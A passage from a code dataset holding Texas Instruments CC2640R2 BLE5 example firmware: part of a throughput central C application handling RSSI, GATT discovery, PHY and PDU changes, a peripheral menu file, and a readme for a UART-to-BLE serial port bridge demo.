*pMsg)\n{\n switch (pMsg->cmdOpcode)\n {\n case HCI_READ_RSSI:\n {\n int8 rssi = (int8)pMsg->pReturnParam[3];\n\n Display_print1(dispHandle, SBC_ROW_RSSI, 0, \"RSSI -dBm: %d\", (uint32_t)(-rssi));\n }\n break;\n\n case HCI_LE_READ_MAX_DATA_LENGTH:\n {\n\n // Define a structure for the returned parameter structure\n // Parameters expected to be returned can be found in the Core Specification\n typedef struct{\n uint8_t status;\n uint8_t maxTxBytes[2];\n uint8_t maxTxTime[2];\n uint8_t maxRxBytes[2];\n uint8_t maxRxTime[2];\n } HCI_Read_Max_Data_Length_Event_t;\n\n HCI_Read_Max_Data_Length_Event_t* temp = (HCI_Read_Max_Data_Length_Event_t*) pMsg->pReturnParam;\n\n // All returned values will be byte reversed - unreverse them for accurate values\n // Here we only care about the RX Bytes, and update the screen with them\n uint16_t ourRxPDUsize = 0;\n ourRxPDUsize = BUILD_UINT16(temp->maxRxBytes[0], temp->maxRxBytes[1]);\n\n // Update User what the current PDU size for Recieving is\n Display_print1(dispHandle, SBC_ROW_PDU, 0, \"Device RX PDU Size: %dB\", ourRxPDUsize);\n }\n break;\n\n default:\n break;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_StartRssi\n *\n * @brief Start periodic RSSI reads on a link.\n *\n * @param connHandle - connection handle of link\n * @param period - RSSI read period in ms\n *\n * @return SUCCESS: Terminate started\n * bleIncorrectMode: No link\n * bleNoResources: No resources\n */\nstatic bStatus_t SimpleBLECentral_StartRssi(uint16_t connHandle, uint16_t period)\n{\n readRssi_t *pRssi;\n\n // Verify link is up\n if (!linkDB_Up(connHandle))\n {\n return bleIncorrectMode;\n }\n\n // If already allocated\n if ((pRssi = SimpleBLECentral_RssiFind(connHandle)) != NULL)\n {\n // Stop timer\n Util_stopClock(pRssi->pClock);\n\n pRssi->period = period;\n }\n // Allocate structure\n else if ((pRssi = SimpleBLECentral_RssiAlloc(connHandle)) != NULL)\n {\n pRssi->period = period;\n }\n // Allocate failed\n else\n {\n return bleNoResources;\n }\n\n // Start timer\n Util_restartClock(pRssi->pClock, period);\n\n return SUCCESS;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_CancelRssi\n *\n * @brief Cancel periodic RSSI reads on a link.\n *\n * @param connHandle - connection handle of link\n *\n * @return SUCCESS: Operation successful\n * bleIncorrectMode: No link\n */\nstatic bStatus_t SimpleBLECentral_CancelRssi(uint16_t connHandle)\n{\n readRssi_t *pRssi;\n\n if ((pRssi = SimpleBLECentral_RssiFind(connHandle)) != NULL)\n {\n // Stop timer\n Util_stopClock(pRssi->pClock);\n\n // Free RSSI structure\n SimpleBLECentral_RssiFree(connHandle);\n\n return SUCCESS;\n }\n\n // Not found\n return bleIncorrectMode;\n}\n\n/*********************************************************************\n * @fn gapCentralRole_RssiAlloc\n *\n * @brief Allocate an RSSI structure.\n *\n * @param connHandle - Connection handle\n *\n * @return pointer to structure or NULL if allocation failed.\n */\nstatic readRssi_t *SimpleBLECentral_RssiAlloc(uint16_t connHandle)\n{\n uint8_t i;\n\n // Find free RSSI structure\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n if (readRssi[i].connHandle == GAP_CONNHANDLE_ALL)\n {\n readRssi_t *pRssi = &readRssi[i];\n\n pRssi->pClock = (Clock_Struct *)ICall_malloc(sizeof(Clock_Struct));\n if (pRssi->pClock)\n {\n Util_constructClock(pRssi->pClock, SimpleBLECentral_readRssiHandler,\n 0, 0, false, i);\n pRssi->connHandle = connHandle;\n\n return pRssi;\n }\n }\n }\n\n // No free structure found\n return NULL;\n}\n\n/*********************************************************************\n * @fn gapCentralRole_RssiFind\n *\n * @brief Find an RSSI structure.\n *\n * @param connHandle - Connection handle\n *\n * @return pointer to structure or NULL if not found.\n */\nstatic readRssi_t *SimpleBLECentral_RssiFind(uint16_t connHandle)\n{\n uint8_t i;\n\n // Find free RSSI structure\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n if (readRssi[i].connHandle == connHandle)\n {\n return &readRssi[i];\n }\n }\n\n // Not found\n return NULL;\n}\n\n/*********************************************************************\n * @fn gapCentralRole_RssiFree\n *\n * @brief Free an RSSI structure.\n *\n * @param connHandle - Connection handle\n *\n * @return none\n */\nstatic void SimpleBLECentral_RssiFree(uint16_t connHandle)\n{\n uint8_t i;\n\n // Find RSSI structure\n for (i = 0; i < MAX_NUM_BLE_CONNS; i++)\n {\n if (readRssi[i].connHandle == connHandle)\n {\n readRssi_t *pRssi = &readRssi[i];\n if (pRssi->pClock)\n {\n Clock_destruct(pRssi->pClock);\n\n // Free clock struct\n ICall_free(pRssi->pClock);\n pRssi->pClock = NULL;\n }\n\n pRssi->connHandle = GAP_CONNHANDLE_ALL;\n break;\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_startDiscovery\n *\n * @brief Start service discovery.\n *\n * @return none\n */\nstatic void SimpleBLECentral_startDiscovery(void)\n{\n attExchangeMTUReq_t req;\n\n // Initialize cached handles\n svcStartHdl = svcEndHdl = 0;\n\n // Free up memory for Characteristic handles\n if( throughputHandles )\n {\n ICall_free(throughputHandles);\n }\n\n // Prep the State Machine for MTU Exchange\n discState = BLE_DISC_STATE_MTU;\n\n // Discover GATT Server's Rx MTU size\n req.clientRxMTU = maxPduSize - L2CAP_HDR_SIZE;\n\n // ATT MTU size should be set to the minimum of the Client Rx MTU\n // and Server Rx MTU values\n VOID GATT_ExchangeMTU(connHandle, &req, selfEntity);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_processGATTDiscEvent\n *\n * @brief Process GATT discovery event\n *\n * @return none\n */\nstatic void SimpleBLECentral_processGATTDiscEvent(gattMsgEvent_t *pMsg)\n{\n if (discState == BLE_DISC_STATE_MTU)\n {\n // MTU size response received, discover simple BLE service\n if (pMsg->method == ATT_EXCHANGE_MTU_RSP)\n {\n // Use the Discovery State Machine to get service start stop handles\n discState = BLE_DISC_STATE_SVC;\n\n // UUID of Service to be Discovered\n uint8_t uuid[ATT_UUID_SIZE] = { TI_BASE_UUID_128(THROUGHPUT_SERVICE_SERV_UUID) };\n // Prep the State Machine for Service Discovery\n discState = BLE_DISC_STATE_SVC;\n\n // Discovery throughput service\n VOID GATT_DiscPrimaryServiceByUUID(connHandle, uuid, ATT_UUID_SIZE,\n selfEntity);\n }\n }\n else if (discState == BLE_DISC_STATE_SVC)\n {\n // Service found, store handles\n if (pMsg->method == ATT_FIND_BY_TYPE_VALUE_RSP &&\n pMsg->msg.findByTypeValueRsp.numInfo > 0)\n {\n svcStartHdl = ATT_ATTR_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n svcEndHdl = ATT_GRP_END_HANDLE(pMsg->msg.findByTypeValueRsp.pHandlesInfo, 0);\n }\n\n // If procedure complete\n if (((pMsg->method == ATT_FIND_BY_TYPE_VALUE_RSP) &&\n (pMsg->hdr.status == bleProcedureComplete)) ||\n (pMsg->method == ATT_ERROR_RSP))\n {\n if (svcStartHdl != 0)\n {\n // The Throughput Service Exists!\n // At this point svcStartHdl and svcEndHdl are valid\n // A write can be performed if needed to a particular UUID\n // Defined in the profile's header file\n // Further discovery is needed to determine characteristic value handles\n\n // Set Statemachine to parse ATT_READ_BY_TYPE_RSP\n discState = BLE_DISC_STATE_CHAR;\n\n // Find all characteristics within our throughput service\n VOID GATT_DiscAllChars(connHandle, svcStartHdl, svcEndHdl, selfEntity);\n }\n }\n }\n else if (discState == BLE_DISC_STATE_CHAR)\n {\n // Characteristics found, store handles\n if ((pMsg->method == ATT_READ_BY_TYPE_RSP) &&\n (pMsg->msg.readByTypeRsp.numPairs > 0))\n {\n // Allocate space for the handle UUID pairs\n throughputHandles = ICall_malloc(sizeof(throughputProfileHdl_t) * pMsg->msg.readByTypeRsp.numPairs);\n\n // Note there are 16 bytes in a 128bit UUID + 2 bytes for the Handle\n // 18 bytes of information need to be copied\n // the remaining 3 bytes indiated in the length field is due to\n // Header information the stack uses.\n int i = 0;\n for (i = 0; i < pMsg->msg.readByTypeRsp.numPairs; i++)\n {\n // Due to the difference between the structure and the data given, apply some logic to\n // extract out the correct information (ie, ignore the 3 byte header)\n throughputProfileHdl_t* temp = (throughputProfileHdl_t*)((pMsg->msg.readByTypeRsp.pDataList + 3) + (pMsg->msg.readByTypeRsp.len * i));\n\n throughputHandles[i].charHdl = temp->charHdl;\n memcpy(throughputHandles[i].addr, temp->addr, ATT_UUID_SIZE);\n }\n // Now verify that the UUIDs are in the order the indexes are\n // We'll skip this step, as the way we implemented the profile on\n // the peripheral always responds with PDU first then PHY characteristics\n\n // This means we can index throughputHandles like throughputHandles[THROUGHPUT_SERVICE_UPDATE_PDU]\n\n // Inform user that the Throughput Service is found, and ready to use\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Throughput Service Found, Starting Throughput\");\n\n // Inform Application to Toggle Throughput\n Event_post(syncEvent, SBC_TOGGLE_THROUGHPUT_EVT);\n }\n discState = BLE_DISC_STATE_IDLE;\n }\n}\n\n/*\n * Local Function to quickly check the device list\n * For a particualr Address\n */\nbool checkDevList(uint8_t* addr, uint8_t* index)\n{\n int i = 0;\n\n for(i = 0; i < scanRes; i++)\n {\n if(memcmp(devList[i].addr, addr, B_ADDR_LEN) == 0)\n {\n *index = i;\n return true;\n }\n }\n\n return false;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_addDeviceInfo\n *\n * @brief Add a device to the device discovery result list\n * Info added is: BDAddr and Scan Response Data\n * It's assumed all data passed in will get freed\n *\n * @return none\n */\nstatic void SimpleBLECentral_addDeviceInfo(uint8_t *pAddr, uint8_t addrType, uint8_t dataType, uint8_t dataLen, uint8_t* data)\n{\n // If result count not at max\n if (scanRes < DEFAULT_MAX_SCAN_RES)\n {\n // Check our device list to ensure we haven't saw this device before\n uint8_t index = 0;\n\n if(checkDevList(pAddr, &index) == false)\n {\n // Create new entry for Device, it's not in our list\n devList[scanRes].addrType = addrType;\n memcpy(devList[scanRes].addr, pAddr, B_ADDR_LEN);\n\n // Assign the index\n index = scanRes;\n\n // Increment scan result count\n scanRes++;\n }\n\n // Create a copy of the data provided\n // Grab Memory from ICall HEAP\n uint8_t* temp = (uint8_t*)ICall_malloc(dataLen);\n // Copy the Data\n memcpy(temp, data, dataLen);\n\n // Check which type of data we have and assign it (@ref GAP_Adv_Report_Types)\n switch(dataType)\n {\n case GAP_ADRPT_ADV_IND:\n case GAP_ADRPT_ADV_NONCONN_IND:\n case GAP_ADRPT_ADV_DIRECT_IND:\n case GAP_ADRPT_ADV_SCAN_IND:\n\n // Any Type of Advertisement Data\n devList[index].advertLen = dataLen;\n devList[index].advertData = temp;\n\n break;\n\n case GAP_ADRPT_SCAN_RSP:\n\n // Scan Response Data\n devList[index].scanLen = dataLen;\n devList[index].scanRsp = temp;\n\n break;\n }\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_eventCB\n *\n * @brief Central event callback function.\n *\n * @param pEvent - pointer to event structure\n *\n * @return TRUE if safe to deallocate event message, FALSE otherwise.\n */\nstatic uint8_t SimpleBLECentral_eventCB(gapCentralRoleEvent_t *pEvent)\n{\n // Forward the role event to the application\n if (SimpleBLECentral_enqueueMsg(SBC_STATE_CHANGE_EVT,\n SUCCESS, (uint8_t *)pEvent))\n {\n // App will process and free the event\n return FALSE;\n }\n\n // Caller should free the event\n return TRUE;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_startDiscHandler\n *\n * @brief Clock handler function\n *\n * @param a0 - ignored\n *\n * @return none\n */\nvoid SimpleBLECentral_startDiscHandler(UArg a0)\n{\n Event_post(syncEvent, SBC_START_DISCOVERY_EVT);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_keyChangeHandler\n *\n * @brief Key event handler function\n *\n * @param a0 - ignored\n *\n * @return none\n */\nvoid SimpleBLECentral_keyChangeHandler(uint8 keys)\n{\n SimpleBLECentral_enqueueMsg(SBC_KEY_CHANGE_EVT, keys, NULL);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_readRssiHandler\n *\n * @brief Read RSSI handler function\n *\n * @param a0 - read RSSI index\n *\n * @return none\n */\nvoid SimpleBLECentral_readRssiHandler(UArg a0)\n{\n SimpleBLECentral_enqueueMsg(SBC_RSSI_READ_EVT, SUCCESS,\n (uint8_t *)&readRssi[a0]);\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_enqueueMsg\n *\n * @brief Creates a message and puts the message in RTOS queue.\n *\n * @param event - message event.\n * @param state - message state.\n * @param pData - message data pointer.\n *\n * @return TRUE or FALSE\n */\nstatic uint8_t SimpleBLECentral_enqueueMsg(uint8_t event, uint8_t state,\n void *pData)\n{\n sbcEvt_t *pMsg = ICall_malloc(sizeof(sbcEvt_t));\n\n // Create dynamic pointer to message.\n if (pMsg)\n {\n pMsg->hdr.event = event;\n pMsg->hdr.state = state;\n pMsg->pData = pData;\n\n // Enqueue the message.\n return Util_enqueueMsg(appMsgQueue, syncEvent, (uint8_t *)pMsg);\n }\n\n return FALSE;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_speedHandler\n *\n * @brief RTOS clock handler that counts number of bytes recieved\n *\n * @param a0 - RTOS clock arg0.\n *\n * @return void\n */\nvoid SimpleBLECentral_speedHandler(UArg a0)\n{\n // Place Bytes Recieved into Circular Buffer\n bytesRecvd_cb[bytesRecvd_cb_index] = bytesRecvd;\n\n // Update Instantanous Throughput\n SimpleBLECentral_enqueueMsg(SBC_MEASURE_INST_SPEED_EVT, SUCCESS, (void*)&bytesRecvd_cb[bytesRecvd_cb_index]);\n\n // Update Average Throughput\n Event_post(syncEvent, SBC_MEASURE_AVG_SPEED_EVT);\n\n // Calculate next Index + Update Rolling Average\n bytesRecvd_cb_index++;\n bytesRecvd = 0; // Reset the count\n if ( bytesRecvd_cb_index >= CB_SIZE )\n {\n // Wrap the index back to the head\n bytesRecvd_cb_index = 0;\n\n // Indicate that the buffer is now filled\n cbBufferFilled = true;\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_PHYHandler\n *\n * @brief RTOS clock handler for Coded PHY changes\n *\n * @param a0 - RTOS clock arg0.\n *\n * @return void\n */\nvoid SimpleBLECentral_PHYHandler(UArg a0)\n{\n // Check if we've changed to 1M before changing to the requested PHY\n if(phyIndex == 0 && phyConfirm)\n {\n // Because we are in a SWI, the UART Driver should not be used\n // Inform the Application task to send request\n SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, phyClock_phyIndex);\n }\n else\n {\n // We're still tring to get to a coded PHY\n // Restart the timer\n Util_restartClock(&startPHYClock, CODED_PHY_CHANGE_DELAY);\n }\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doSetDLEPDU\n *\n * @brief Set PDU preference.\n *\n * @param index - 0, 1\n *\n * @return always true\n */\nbool SimpleBLECentral_doSetDLEPDU(uint8 index)\n{\n // Vars to keep track of active packet length settings\n uint16_t* txOctets = ICall_malloc(sizeof(uint16_t));\n uint16_t txTime = 0;\n\n switch (index)\n {\n case 0:\n *txOctets = DEFAULT_PDU_SIZE;\n txTime = 328;\n break;\n case 1:\n *txOctets = DLE_MAX_PDU_SIZE;\n txTime = 17040;\n break;\n }\n\n // ONLY RX PDU of Peripheral can be modified from central\n // In other words, using the commands below which adjust this devices TX PDU,\n // the peer device will adjust it's RX PDU size to allow reception.\n\n if( throughputHandles )\n {\n // Here we'll utilize the throughput profile to have the peer device\n // change it's TX PDU size in order to send more data and increase throughput\n // or decrease TX PDU size to reduce throughput\n\n // Inform the Application to perform a GATT write with\n // the selected size\n SimpleBLECentral_enqueueMsg(SBC_PDU_UPDATE_EVT, SUCCESS, (void*) txOctets);\n }\n else\n {\n // DLE HCI command to adjust PDU size for current connection\n HCI_LE_SetDataLenCmd(connHandle, *txOctets, txTime);\n\n // write suggested default for future connections\n HCI_LE_WriteSuggestedDefaultDataLenCmd(*txOctets, txTime);\n\n ICall_free(txOctets);\n }\n\n // Go to Main Menu\n tbm_goTo(&sbcMenuMain);\n\n return true;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doSetPhy\n *\n * @brief Set PHY preference.\n *\n * @param index - 0, 1, 2, 3\n *\n * @return always true\n */\nbool SimpleBLECentral_doSetPhy(uint8 index)\n{\n static uint8_t phy[] = {\n HCI_PHY_1_MBPS, HCI_PHY_2_MBPS, HCI_PHY_CODED, HCI_PHY_CODED\n };\n\n // Swtich to determine PHY options (needed for coded S2 and S8 mode)\n switch(index)\n {\n case 0:\n case 1:\n phyOptions = HCI_PHY_OPT_NONE;\n break;\n case 2:\n phyOptions = HCI_PHY_OPT_S2;\n break;\n case 3:\n phyOptions = HCI_PHY_OPT_S8;\n break;\n }\n\n // Generate index to send over to peripheral\n uint8_t* data = ICall_malloc(sizeof(uint8_t));\n switch(phy[index])\n {\n case HCI_PHY_1_MBPS:\n *data = 0;\n break;\n\n case HCI_PHY_2_MBPS:\n *data = 1;\n break;\n\n case HCI_PHY_CODED:\n {\n if(phyOptions == HCI_PHY_OPT_S2)\n *data = 2;\n else if (phyOptions == HCI_PHY_OPT_S8)\n *data = 3;\n }\n break;\n }\n\n if( throughputHandles )\n {\n\n // Check if we're already using coded PHY - switch over to 1M\n // between in order to keep stability\n if(phyIndex != *data && *data >= 2 && phyIndex >= 2)\n {\n uint8_t* phy1M = ICall_malloc(sizeof(uint8_t));\n *phy1M = 0;\n SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, phy1M);\n\n // Start A Timer to trigger a Coded PHY change\n Util_restartClock(&startPHYClock, CODED_PHY_CHANGE_DELAY);\n\n // Assign the requested PHY to the payload of the PHY handler\n phyClock_phyIndex = data;\n }\n else\n {\n // Inform the Application to perform a GATT write with\n // the selected size - this will tell the peripehral to change PHY\n SimpleBLECentral_enqueueMsg(SBC_PHY_UPDATE_EVT, SUCCESS, data);\n }\n\n }\n else\n {\n // Set this device's Phy Preference on the current connection.\n HCI_LE_SetPhyCmd(connHandle, LL_PHY_USE_PHY_PARAM, phy[index], phy[index], phyOptions);\n\n // Set this device's PHY Perference on future connections by using:\n HCI_LE_SetDefaultPhyCmd(LL_PHY_USE_PHY_PARAM, phy[index], phy[index]);\n\n ICall_free(data);\n }\n\n // Go to Main Menu\n tbm_goTo(&sbcMenuMain);\n\n return true;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doScanAndConnect\n *\n * @brief Set PHY preference.\n *\n * @param index - 0, 1, 2(, 3, 4)\n *\n * @return always true\n */\nbool SimpleBLECentral_doScanAndConnect(uint8 index)\n{\n switch (index)\n {\n case 0:\n // SELECT NEXT DEVICE ON SCAN LIST\n SBC_NextDevice();\n\n break;\n\n case 1:\n // CONNECT TO SELECTED DEVICE\n SBC_ConnectToDevice();\n\n break;\n\n case 2:\n // SCAN FOR DEVICES\n\n // Disable Scanning until completed\n tbm_setItemStatus(&sbcMenuScanandConnect, TBM_ITEM_NONE, TBM_ITEM_ALL);\n\n // Indicate to the user that Scanning Has Started\n Display_print0(dispHandle, SBC_ROW_RESULT, 0, \"Scanning...\");\n\n // Clear the Device List\n SBC_ClearDeviceList();\n\n // Command to tell GAPRole to start scanning\n GAPCentralRole_StartDiscovery(DEFAULT_DISCOVERY_MODE,\n DEFAULT_DISCOVERY_ACTIVE_SCAN,\n DEFAULT_DISCOVERY_WHITE_LIST);\n break;\n }\n\n return true;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doToggleRSSI\n *\n * @brief Toggle RSSI Readings\n *\n * @param index (ignored)\n *\n * @return always true\n */\nbool SimpleBLECentral_doToggleRSSI(uint8 index)\n{\n // Ignored\n (void)index;\n\n if (SimpleBLECentral_RssiFind(connHandle) == NULL)\n {\n Display_print0(dispHandle, SBC_ROW_RSSI, 0, \"RSSI Starting\");\n SimpleBLECentral_StartRssi(connHandle, DEFAULT_RSSI_PERIOD);\n }\n else\n {\n SimpleBLECentral_CancelRssi(connHandle);\n Display_print0(dispHandle, SBC_ROW_RSSI, 0, \"RSSI Canceled\");\n }\n\n return true;\n}\n\n/*********************************************************************\n * @fn SimpleBLECentral_doDisconnect\n *\n * @brief Disconnect from current Connection\n *\n * @param index (ignored)\n *\n * @return always true\n */\nbool SimpleBLECentral_doDisconnect(uint8 index)\n{\n // Ignored\n (void)index;\n\n GAPCentralRole_TerminateLink(connHandle);\n\n return true;\n}\n\n/*********************************************************************\n * @fn SBC_ClearDeviceList\n *\n * @brief Clear the Device List and Display.\n *\n * @return void\n */\nvoid SBC_ClearDeviceList(){\n\n int i = 0;\n\n //Go through Device List and Clear out the ICALL Heap Allocs\n for(i = 0; i < scanRes; i++){\n if(devList[i].advertData != NULL)\n {\n ICall_free(devList[i].advertData);\n devList[i].advertData = NULL;\n devList[i].advertLen = 0;\n\n }\n\n if(devList[i].scanRsp != NULL)\n {\n ICall_free(devList[i].scanRsp);\n devList[i].scanRsp = NULL;\n devList[i].scanLen = 0;\n }\n }\n\n // Clear the Device Display\n Display_clearLine(dispHandle, SBC_ROW_STATUS_2);\n Display_clearLine(dispHandle, SBC_ROW_STATUS_3);\n Display_clearLine(dispHandle, SBC_ROW_STATUS_4);\n\n // Reset Scan Res indicating No Valid Scan data on Device List\n scanRes = 0;\n scanIdx = -1;\n}\n\n/*********************************************************************\n * @fn SBC_NextDevice\n *\n * @brief Select the next device on the Device List and Display.\n *\n * @return void\n */\nvoid SBC_NextDevice(){\n // Increment scanIndex to the next valid entry\n ((scanIdx + 1) == scanRes) ? scanIdx = 0 : scanIdx++;\n\n // Print the Device pointed to by the Index\n Display_print1(dispHandle, SBC_ROW_STATUS_2, 0, \"Scanned Device %d\", (scanIdx+1));\n Display_print0(dispHandle, SBC_ROW_STATUS_3, 0, Util_convertBdAddr2Str(devList[scanIdx].addr));\n\n // Is next device a throughput Peripheral?\n if(memcmp(searchStr, devList[scanIdx].scanRsp, sizeof(searchStr)) == 0)\n {\n Display_print0(dispHandle, SBC_ROW_STATUS_4, 0, \"-- Throughput Profile Supported --\");\n }\n else\n {\n Display_clearLine(dispHandle, SBC_ROW_STATUS_4);\n }\n}\n\n/*********************************************************************\n * @fn SBC_ConnectToDevice\n *\n * @brief Connect to the selected Device\n *\n * @return void\n */\nvoid SBC_ConnectToDevice()\n{\n // connect to current device selected by scanIdx\n uint8_t *peerAddr = devList[scanIdx].addr;\n uint8_t addrType = devList[scanIdx].addrType;\n\n // GAP Role to Connecting\n state = BLE_STATE_CONNECTING;\n\n GAPCentralRole_EstablishLink(DEFAULT_LINK_HIGH_DUTY_CYCLE,\n DEFAULT_LINK_WHITE_LIST,\n addrType, peerAddr);\n}\n\n/*********************************************************************\n*********************************************************************/\n"
},
{
"alpha_fraction": 0.6898550987243652,
"alphanum_fraction": 0.7057970762252808,
"avg_line_length": 35.28947448730469,
"blob_id": "006f49c200c58b102d888a850bb72631ca6e1b36",
"content_id": "ae3d9835a989f2684f061309fed2ece5be893db4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1380,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 38,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_peripheral/src/app/throughput_peripheral_menu.c",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "#include <bcomdef.h>\n#include <ti/display/Display.h>\n\n#if defined(BLE_V50_FEATURES) && (BLE_V50_FEATURES & PHY_2MBPS_CFG) && !defined(Display_DISABLE_ALL)\n#include <menu/two_btn_menu.h>\n#include \"throughput_peripheral_menu.h\"\n#include \"throughput_peripheral.h\"\n\n/*\n * Menu Lists Initializations\n */\n\n/* Menu: Main\n 2 submenus, 1 action, no upper */\nMENU_OBJ(sbpMenuMain, NULL, 3, NULL)\n MENU_ITEM_SUBMENU(&sbpMenuSetPhy)\n MENU_ITEM_SUBMENU(&sbpMenuSetDLEPDU)\n MENU_ITEM_ACTION(\"Toggle Throughput Demo\", SimpleBLEPeripheral_doThroughputDemo)\n MENU_ITEM_ACTION(\"Disconnect from Peer\", SimpleBLEPeripheral_doThroughputDemo)\nMENU_OBJ_END\n\n/* Menu: Set PHY\n 5 actions, upper = sbpMenuMain */\nMENU_OBJ(sbpMenuSetPhy, \"Set PHY\", 4, &sbpMenuMain)\n MENU_ITEM_ACTION(\"1 Mbps\", SimpleBLEPeripheral_doSetPhy)\n MENU_ITEM_ACTION(\"2 Mbps\", SimpleBLEPeripheral_doSetPhy)\n MENU_ITEM_ACTION(\"Coded:S2\", SimpleBLEPeripheral_doSetPhy)\n MENU_ITEM_ACTION(\"Coded:S8\", SimpleBLEPeripheral_doSetPhy)\nMENU_OBJ_END\n\n/* Menu: Set DLE PDU\n 2 actions, upper = sbpMenuMain */\nMENU_OBJ(sbpMenuSetDLEPDU, \"Set PDU\", 2, &sbpMenuMain)\n MENU_ITEM_ACTION(\"27 Bytes\", SimpleBLEPeripheral_doSetDLEPDU)\n MENU_ITEM_ACTION(\"251 Bytes\", SimpleBLEPeripheral_doSetDLEPDU)\nMENU_OBJ_END\n\n#endif // PHY_2MBPS_CFG && !Display_DISABLE_ALL\n\n"
},
{
"alpha_fraction": 0.6458106637001038,
"alphanum_fraction": 0.6961371302604675,
"avg_line_length": 44.38271713256836,
"blob_id": "d4e59fe696f4bda552c03a64b62fce73f17cc709",
"content_id": "e942d36c20cae3c307383a3004b9ba5cc4333ce6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3677,
"license_type": "no_license",
"max_line_length": 106,
"num_lines": 81,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/spp_ble_client/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
"text": "\nPurpose / Scope\n===============\n\nThis purpose of this example is to demonstrate a UART to BLE bridge using TI's proprietary\nSerial Port Profile (SPP). The project is based on the \n[UART to Bluetooth® Low Energy (BLE) Bridge Reference Design](http://www.ti.com/tool/TIDC-SPPBLE-SW-RD), \nand has been enhanced to include Bluetooth 5.0 features such as LE 2M PHY.\n\nPrerequisites\n=============\n\n#### Hardware Requirements\n\nBefore running the demo, the user will need the following components:\n\n- 2x [CC2650R2 LaunchPad](http://www.ti.com/tool/launchxl-cc2640r2)\n- 2x Micro USB cable\n\n#### Firmware Requirements\n\n- [BLE5-Stack](http://www.ti.com/tool/SIMPLELINK-CC2640R2-SDK)\n\nSerial Port Service (SPS)\n=========================\n\nThe serial port service is made to implement a bi-directional UART connection over the \nBLE protocol. The service uses a 128 bit UUID: F000C0E0-0451-4000-B000-00000000-0000. \nSPS contains three characteristics, they are listed below.\n\n| Characteristic | UUID |\n|:-----------------:|:-----------------------------------------:|\n|Data | F000C0E1-0451-4000-B000-00000000-0000 |\n|Status | F000C0E2-0451-4000-B000-00000000-0000 |\n|Config | F000C0E3-0451-4000-B000-00000000-0000 |\n\nFor more information about the Serial Port Profile (SPP), please see the \n[TI-Design Guide](http://www.ti.com/tool/TIDC-SPPBLE-SW-RD) or the \n[SPS Spec Document](http://www.ti.com/lit/TIDUA63).\n\nRunning the Demo\n================\n\nRunning the demo is as simple and compiling and loading the code, then hooking up to \nyour PC to send a receive data over UART. Please follow the steps below:\n\n1. Compile and load the code\n - Build LaunchPad #1 with the `ble5_spp_ble_client_cc2640r2lp_stack_library` FlashROM_Library project\n - Build and load LaunchPad #1 with the `ble5_spp_ble_client_cc2640r2lp_app` FlashROM_StackLibrary project\n - Build LaunchPad #2 with the `ble5_spp_ble_server_cc2640r2lp_stack_library` FlashROM_Library project\n - Build and load LaunchPad #2 with the `ble5_spp_ble_server_cc2640r2lp_app` FlashROM_StackLibrary project\n\n2. Connect the Boards to the PC terminal\n - You can use the terminal to send data from your PC to the LaunchPad, \n and also display the info sent from one device to another.\n - You will need to open two instances of the terminal program to, \n one to communicate with each board.\n - Follow the steps from our [FAQ](faq.md) to connect to the LaunchPad boards\n - **Please note that the SPP project uses the default baud rate of 115200**\n\n2. Power the boards individually and verify they are initialized\n - The client will blink the green LED twice at initialzation. \n It will also display `Auto connecting...` on the terminal\n - The server will blink the red LED once at initialization\n - The client will auto connect to the server using a hardcoded BD\\_ADDR\n - Upon connecting the client will display: \n `Discovering services...Found Serial Port Service...Data Char Found...Notification enabled...`\n - At this point you can type into either terminal window and watch it being echoed \n to the other terminal via BLE.\n\nIn addition to the UART display interface, the project uses the following buttons:\n\nKey | Description\n------------|-----------------------------------------------\nBTN-1 | Send an ASCII character over the air\nBTN-2 | Toggle between 2Mbps and 1Mbps PHY\n\nReferences\n==========\n * [UART To BLE Bridge Wiki](http://processors.wiki.ti.com/index.php/CC2640_UART_to_BLE_Bridge)\n * [UART To BLE Bridge TI Design](http://www.ti.com/tool/TIDC-SPPBLE-SW-RD)\n * [SPS Spec Document](http://www.ti.com/lit/TIDUA63)"
},
{
"alpha_fraction": 0.7302625775337219,
"alphanum_fraction": 0.7486870288848877,
"avg_line_length": 39.47038269042969,
"blob_id": "24cce1f0cdd13ff152a3eaa506254e67667b1269",
"content_id": "23c5a718c3eb5b1321036ed61f4a9fbfdd2ba232",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 11615,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 287,
"path": "/examples/rtos/CC2640R2_LAUNCHXL/ble5apps/throughput_peripheral/readme.md",
"repo_name": "rlatrifork/ble_examples_test",
"src_encoding": "UTF-8",
